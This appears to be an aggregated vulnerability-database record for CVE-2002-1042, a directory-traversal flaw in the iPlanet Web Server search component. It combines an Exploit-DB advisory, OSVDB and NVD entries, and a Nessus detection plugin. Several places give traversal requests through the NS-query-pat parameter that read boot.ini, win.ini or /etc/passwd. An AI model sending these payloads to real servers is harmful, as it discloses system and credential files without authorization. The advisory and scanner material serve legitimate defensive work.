iPlanet Web Server 4.1 - Search Component File Disclosure Vulnerability
2002-07-09T00:00:00
ID EDB-ID:21603 Type exploitdb Reporter Qualys Corporation Modified 2002-07-09T00:00:00
Description
iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability. CVE-2002-1042. Remote exploits for multiple platform
source: http://www.securityfocus.com/bid/5191/info
The iPlanet Web Server search engine is prone to a file disclosure vulnerability. It is possible for remote attackers to make requests to the search engine which will cause arbitrary readable files on the host running the vulnerable software to be disclosed to the attacker.
This issue was reported for iPlanet Web Server on Microsoft Windows operating systems. Since the server typically runs in the SYSTEM context on these operating systems, it may be possible for an attacker to disclose the contents of arbitrary files. It has not been confirmed whether this vulnerability exists on other platforms that the software is compatible with. The search engine functionality does not appear to be available for versions of the software on Linux platforms.
GET /search?NS-query-pat=..\..\..\..\..\boot.ini
{"id": "EDB-ID:21603", "type": "exploitdb", "bulletinFamily": "exploit", "title": "iPlanet Web Server 4.1 - Search Component File Disclosure Vulnerability", "description": "iPlanet Web Server 4.1 Search Component File Disclosure Vulnerability. CVE-2002-1042. Remote exploits for multiple platform", "published": "2002-07-09T00:00:00", "modified": "2002-07-09T00:00:00", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/21603/", "reporter": "Qualys Corporation", "references": [], "cvelist": ["CVE-2002-1042"], "lastseen": "2016-02-02T16:51:47", "viewCount": 2, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2016-02-02T16:51:47", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-1042"]}, {"type": "osvdb", "idList": ["OSVDB:846"]}, {"type": "nessus", "idList": ["IPLANET_SEARCH.NASL"]}], "modified": "2016-02-02T16:51:47", "rev": 2}, "vulnersScore": 5.8}, "sourceHref": "https://www.exploit-db.com/download/21603/", "sourceData": "source: http://www.securityfocus.com/bid/5191/info\r\n\r\nThe iPlanet Web Server search engine is prone to a file disclosure vulnerability. It is possible for remote attackers to make requests to the search engine which will cause arbitrary readable files on the host running the vulnerable software to be disclosed to the attacker.\r\n\r\nThis issue was reported for iPlanet Web Server on Microsoft Windows operating systems. Since the server typically runs in the SYSTEM context on these operating systems, it may be possible for an attacker to disclose the contents of arbitrary files. It has not been confirmed whether this vulnerability exists on other platforms that the software is compatible with. The search engine functionality does not appear to be available for versions of the software on Linux platforms.\r\n\r\nGET /search?NS-query-pat=..\\..\\..\\..\\..\\boot.ini ", "osvdbidlist": ["846"]}
{"cve": [{"lastseen": "2020-10-03T11:37:00", "description": "Directory traversal vulnerability in search engine for iPlanet web server 6.0 SP2 and 4.1 SP9, and Netscape Enterprise Server 3.6, when running on Windows platforms, allows remote attackers to read arbitrary files via ..\\ (dot-dot backslash) sequences in the NS-query-pat parameter.", "edition": 3, "cvss3": {}, "published": "2002-10-04T04:00:00", "title": "CVE-2002-1042", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-1042"], "modified": "2008-09-05T20:29:00", "cpe": ["cpe:/a:sun:iplanet_web_server:4.1", "cpe:/a:sun:one_application_server:6.0", "cpe:/a:sun:one_web_server:6.0", "cpe:/a:netscape:enterprise_server:3.6"], "id": "CVE-2002-1042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1042", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sun:iplanet_web_server:4.1:sp5:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp1:*:*:*:*:*:*", "cpe:2.3:a:sun:one_application_server:6.0:sp1:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp9:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp10:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp8:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp10:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp7:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp7:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp4:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp8:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp4:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp2:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp6:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp1:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp3:*:*:*:*:*:*", "cpe:2.3:a:sun:one_application_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp2:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp6:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:one_web_server:6.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp3:enterprise:*:*:*:*:*", "cpe:2.3:a:netscape:enterprise_server:3.6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp5:enterprise:*:*:*:*:*", "cpe:2.3:a:sun:one_application_server:6.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:sun:iplanet_web_server:4.1:sp9:enterprise:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:55", "bulletinFamily": "software", "cvelist": ["CVE-2002-1042"], "edition": 1, "description": "## Vulnerability Description\niPlanet/One Web Server contains a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the \"search\" script not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the \"NS-query-pat\" variable.\n## Solution Description\nUpgrade to iPlanet Web Server 4.1 Service Pack 11 or Sun ONE Web Server 6.0 Service Pack 4, as it has been reported to fix this vulnerability. Administrators may also disable or remove the search feature.\n## Short Description\niPlanet/One Web Server contains a flaw that allows a remote attacker to access arbitrary files outside of the web path. The issue is due to the \"search\" script not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the \"NS-query-pat\" variable.\n## Manual Testing Notes\nhttp://[victim]/search?NS-query-pat=..\\..\\..\\..\\..\\boot.ini\n## References:\n[Vendor Specific Advisory URL](http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F46127)\nSnort Signature ID: 1828\nOther Advisory URL: http://www.cgisecurity.net/archive/webservers/iplanet_search-option-remote_file_viewing.txt\n[Nessus Plugin ID:11043](https://vulners.com/search?query=pluginID:11043)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-07/0085.html\nKeyword: Directory Traversal\nISS X-Force ID: 9517\n[CVE-2002-1042](https://vulners.com/cve/CVE-2002-1042)\nBugtraq ID: 5191\n", "modified": "2002-07-09T00:00:00", "published": "2002-07-09T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:846", "id": "OSVDB:846", "title": "iPlanet/One Web Server search Arbitrary File Access", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-01T03:16:40", "description": "An attacker may be able to read arbitrary files on the remote web \nserver, using the 'search' CGI that comes with iPlanet.", "edition": 26, "published": "2002-07-10T00:00:00", "title": "iPlanet Search Engine search CGI Arbitrary File Access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2002-1042"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "IPLANET_SEARCH.NASL", "href": "https://www.tenable.com/plugins/nessus/11043", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security \n# Erik Anderson <eanders@carmichaelsecurity.com>\n# Added BugtraqID and CAN\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11043);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2002-1042\");\n script_bugtraq_id(5191);\n \n script_name(english:\"iPlanet Search Engine search CGI Arbitrary File Access\");\n script_summary(english:\"Attempts to read an arbitrary file using a feature in iPlanet\"); \n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is hosting a CGI application that is affected\nby an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"An attacker may be able to read arbitrary files on the remote web \nserver, using the 'search' CGI that comes with iPlanet.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2002/Jul/85\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to iPlanet Web Server 4.1 Service Pack 11 or Sun ONE Web \nServer 6.0 Service Pack 4, as it has been reported to fix this \nvulnerability.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2002/07/10\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2002/07/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n \n script_copyright(english:\"This script is Copyright (C) 2002-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Web Servers\");\n\n script_dependencie(\"http_version.nasl\", \"find_service1.nasl\", \"no404.nasl\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\n\n\nfunction check(item, exp)\n{\n local_var res, r, r2;\n res = http_send_recv3(method:\"GET\", item:item, port:port);\n if (isnull(res)) exit(1, \"The web server on port \"+port+\" failed to respond.\");\n\n if(egrep(string:res[2], pattern:exp, icase:1)){\n \tr2 = strstr(res[1], '\\r\\n\\r\\n');\n\tif (strlen(r2) == 0) r2 = res[2];\n\telse r2 -= '\\r\\n\\r\\n';\n r2 = data_protection::redact_etc_passwd(output:r2);\n\tr = strcat('\\n', build_url(port: port, qs: item),\n\t '\\nrevealed the content of a protected file :\\n', r2, '\\n');\n\tsecurity_warning(port:port, extra: r);\n\texit(0);\n\t}\n return(0);\n}\n\n\ncheck(item:\"/search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\", exp:\"\\[fonts\\]\");\ncheck(item:\"/search?NS-query-pat=../../../../../../../../../etc/passwd\", exp:\"root:.*:0:[01]:.*\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
